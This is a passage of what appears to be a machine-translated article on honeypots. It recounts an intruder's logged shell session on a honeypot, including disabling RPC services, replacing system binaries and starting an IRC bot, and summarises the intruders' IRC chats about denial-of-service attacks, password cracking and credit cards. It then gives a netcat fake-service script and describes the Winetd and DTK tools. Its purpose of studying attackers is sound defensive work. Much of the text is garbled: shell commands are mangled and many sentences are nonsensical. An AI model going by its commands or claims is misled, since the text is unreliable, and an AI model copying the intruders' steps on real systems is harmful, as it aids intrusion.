Exit ./sys222{ 7}: Success Went Into the Background.

Then there are many files to modify, including / bin / login, / bin / ls, / usr / sbin / netstat, and / bin / ps, we strongly recommend looking at the source code for setup.sh and second, see these two What did you do because we will recover systems that are attacked by a similar tool.

# kill -9 11467

# ps -u root | GREP | GREP

inetd inetd

207? 0:00 inetd

# ..U / secure.sh / secure.sh

./secure.sh: rpc.ttdb =: not Found

#: securing.

CHANGING MODES ON LOCAL FILES.

#: Will Add More Local Security Later.

#: 2) Remote Crap Like Rpc.status, NLOCKMGR ETC ..

./secure.sh: usage: kill [[-sig] id ... | -l]

./secure.sh: usage: kill [[-sig] id ... | -l]

./secure.sh: usage: kill [[-sig] id ... | -l]

./secure.sh: usage: kill [[-sig] id ... | -l]

#: 3) Killed Statd, Rpcbind, NLOCKMGR

#: 4) Removing Them So They Ever Start Again!

5) secured.

# PPUS -U S -U U || U Grep Grep Ttutdbtdb

UPS: OPTION REQUIRES AN Argument - U

USAGE: PS [-AADeflcj] [-o format] [-t termlist]

[-U UserList] [-u userlist] [-g grouplist]

[-p proClist] [-g pgrplist] [-s sidlist]

'Format' is one or more of:

User Ruse Group Rgroup Uid Ruid Gid Rgid Pid PPID PGID SID

PRI OPRI PCPU PMEM vsz RSS OSZ Nice Class Time ETIME STIME

F S c Tty Addr WCHAN FNAME COMM ARGS

# PPUS -S -UADJ | GREP TTDBADJ | GREP TTDB

Finally, our guests have run IRC BOT, which ensures their control of IRC channels, this BOT also records their session record.

# ../me -f bot2

Init: Using Config File: BOT2

EnergyMech 2.7.1, decEmber 2nd, 1999

Starglider Class EnergyMech

Compiled on Jan 27 2000 07:06:04

Features: Dyn, New, SEF

Init: Unknown Configuration

Item: "Noseen" (IGNORED)

Init: mechs added [save2]

Init: Warning: Save2 Has No UserList, Running In Setup Modeinit: EnergyMech Running ...

# exit;

$ EXIT

Once this BO is ready, they left the system, that is, this BOT captures all of their dialogue. If you want to know more about IRC information, you can refer to David Brumley's << Tracking Hackers on IRC >> article. Within a week, they returned several times to see if the system is still in their control. But after a week, they reopened and attempted to use the resources here to reject the service attacks. Of course, they have not succeeded, our "Honeypot" has considered similar problems at the beginning of the design, all attempts to use our system will be blocked, and the denial of service attacks they initiated are automatically blocked.

Next, we mainly analyze the behavior and psychology of hackers through their dialogue in IRC. Through these, we can better counterattack hackers.

The following row is the next two weeks in two weeks, we temporarily call this IRC channel as K1DD13, two of whom named D1CK and J4N3, many of whom, for example, IP and other information, we have changed here. We can see that they don't even understand the basic knowledge of many UNIX, but they can still harm a lot of systems.

On the first day, June 4th

The conversation mainly discusses the establishment of a vulnerability database to attack potential goals through sharing resources.

The next day, June 5th

Today, D1CK and J4N3 share vulnerabilities, special attention is how many networks have been attacked by them, as if they are attacking a university, they also discuss new tools on Linux and SPARC.

On the third day, June 6th

D1CK and J4N3 Buffling How many systems have rejected service attacks, followed by D1CK J4N3 how Mount is partition, and then they discuss how to use Sniffit, and finally D1CK seems to search for IRIX vulnerabilities and attack tools.

On the fourth day, June 7th

D1CK and J4N3 determine a system of rejecting a service attack on India, and in the end, they deduct other IRC users.

Day 5, June 8

D1CK, please J4N3 to occupy three systems, D1CK and his brother SP07 try to discover how sniffer work, similar problem "Sniffer probe must be in the same network?"

Day 6, June 9

Our friends seem very busy, it seems that D1CK has invaded 40 systems.

Day 7, June 10

One day, D1CK teaches a new cross-knee K1DD13 how to use Sadmind vulnerabilities, we are uncertain, do we understand how D1CK understands how to use

Day 8, June 11th

D1CK and J4N3 discuss the systems they have and their people who want to refuse to deny their services, D1CK discovers the death of death.

Ninth day, June 12

It seems that D1CK hits the Universiade, he discovered an ISP and got it for their bill access rights and 5000 accounts.

Tenth day, June 13th

SP07 is added.

On the eleventh, June 14th

They start CRACK user password and access personal account.

Day 12, June 15th

D1CK and J4N3 try to discover credit card numbers in a credit card channel, if they succeed, they can buy some domain names.

13th, June 16th

D1CK and J4N3 are still in this credit card channel. At the end of the chat, they put the focus again in their own web site.

Day 14, June 17

D1CK and J4N3 talk about credit cards and continue to build our own web site. We have already learned that this hacking group is in 14 days. Of course, not all hacked groups are like this. In fact, we obey only a small part, but we hope that this information can give you a lot of tips, they have Many don't have high technical strength as we think, and even a lot does not understand the tools they are using, but once they are very concerned about some systems, they can get what we don't think. This is not a dramatic, they don't care about the hazards they have, they only care about their attacks.

This article is the results of the Honeypot project, and the Honeypot project is a project initiated by some security experts to understand the tools and strategies used by the hacker community.

3. A simple "Honeypot" implementation

I have seen the above case introduction. Are you can't try to build a "Honeypot" to monitor your network or system? So how do we implement a "Honeypot"? Netcat This universal Swiss army knife, the nasal ancestor of the hacker tool is easy to do. God Bless Me! Thanks to Weld and L0PHT members to prepare such excellent "Honeypot" :), and can be used on multiple platforms, download:

http://www.l0pht.com/~weld/netcat.

Under normal circumstances, many hackers like to try to perform slow scan for the other party system service to confirm the next possible attack direction. One of the features of Netcat is to help us help our services on some ports, which allows us to build some false services in our Linxu, NT, FreeBSD: Sendmail, DNS, Telnet, FTP or even Web Server, etc. This can audit some port scans and connection information. Of course, there are some problems such as "nmap -ss Victim", but in fact, many hackers are in the case where the port is opened. Determine the information of the service, such as version, they will choose to complete three handshakes, so their IP ........

The code listed below is a "Honeypot" on the Solaris workstation, first of all, you need to resume each listener, the Netcat option:

-L General listening mode

-P you choose port

-VV dual length mode

XXX.XXX.XXX.XXX system uses IP

In the script here, use a general listening mode rather than recursive mode (-L) because it is because you want to add a comment in audit information after each other attempts to connect. Here, the annotation is added by recycling the audit information to facilitate auditing. One thing that needs to be emphasized is to specify the native IP, so that the port only allows the unit to connect, otherwise any other system can pass the port access system. At the same time, in order to facilitate auditing, add some rows to another file and clean up the original record file.

BELOW Is The Contents of My "Port25" Script file.

What is listed here is "port25" script

While True; Do

/ usr / bin / nc -l -p 25 -VV xxx.xxx.xxx.xxx 2 >> / var / audit / nc-port25

Date >> / var / audit / nc-port25

echo "******************* Failed sendmail Attempt - Port 25

******************** / N ">> / var / audit / nc-port25cat / var / audit / nc-port25 >> / var / audit / nc- log

Cp / dev / null / var / audit / nc-port25

DONE

Add "2" at the end of each command line to redirect the error information channel audit information.

Similarly, we can generate other scripts and then run.

/ VAR / AUDIT / NC-Wrappers / Port25 &

/ VAR / AUDIT / NC-Wrappers / Port79 &

/ VAR / AUDIT / NC-Wrappers / Port512 &

/ VAR / AUDIT / NC-Wrappers / Port513 &

/ VAR / AUDIT / NC-Wrappers / Port514 &

....

....

....

Finally, we can make a script in the "/etc/rc2.d" directory so that the system will automatically run our "Honeypot".

NMAP scan results:

FTP -------------- 21

Telnet ------------ 23

Sendmail -------- 25

TFTP ------------- 69

Finger ------------ 79

Web -------------- 80, 443, 8080

NetBIOS --------- 139

REXEC ------------- 512

Rlogin ------------- 513

RSH ----------------- 514

Netbus ------------- 12345

BO ------------------ 31337

4. Explanation of tools

4.1 Winetd

Winetd is a very simple "Honeypot" implementation, the installation is very simple, the interface is also very friendly, but the disguise is too simple, it can't truly trick hackers, if you press function, it is not a strict "Honeypot" ".

When we see the default start, our system opens very little service, below the following uses NMAP to the result of WINETD:

Port State Service

135 / TCP Open LOC-SRV

445 / TCP Open Microsoft-DS

3389 / TCP OPEN MSRDP

We can see that the system only opens three ports.

After starting WINETD, it will open the following services on our system, such as Echo, Telnet, SMTP, etc., NMAP scan results:

Port State Service

3 / TCP Open CompressNet

7 / TCP Open Echo

13 / TCP Open Daytime

23 / TCP OPEN TELNET

25 / TCP Open SMTP

34 / TCP Open unknown

135 / TCP Open LOC-SRV

137 / TCP Open NetBIOS-NS

139 / TCP Open NetBIOS-SSN

445 / TCP Open Microsoft-DS

3389 / TCP OPEN MSRDP

We telnet to 23 ports, pop up the following information:

Red Hat Linux Realease 7.0 (Guinness) kernel 2.2.16-22 on AN i686

Login:

In fact, our system is a W2K. Of course, the flexibility of WINETD is that it can define the services you want to open, and what kind of program is used to simulate. And it also has logs and counterattacks

When we scan or other probe activities running WINETD, it will find probe information, as shown below, we use NMAP to use NMAP to use the log information left behind.

We may also pay attention to if an experienced hacker, such "Honeypot" is not to kive him, first using FingerPrint technology to detect the system is Linux or W2K, if it is found to be W2K, and Telnet also displays the information above. Then hackers will soon leave us, and even angry will attack our system.

Winetd is a free software, its ideas are very good, becomes a real "Honeypot", but it still needs to be developed in-depth.

4.2 DTK

DTK (Decept Tool Kit), can run on a variety of UNIX systems, which is developed by Fred Cohen.

DTK can really simulate the system has ten kinds, and it simulates a lot of services, more specifically, we can call it a state machine, very powerful, need C and Perl compiler to compile operation, the disadvantage is It is very troublesome when building, for example, when compiling, you will choose your own operating system, select the operating system you want to imitate. download

http://all.net/dtk/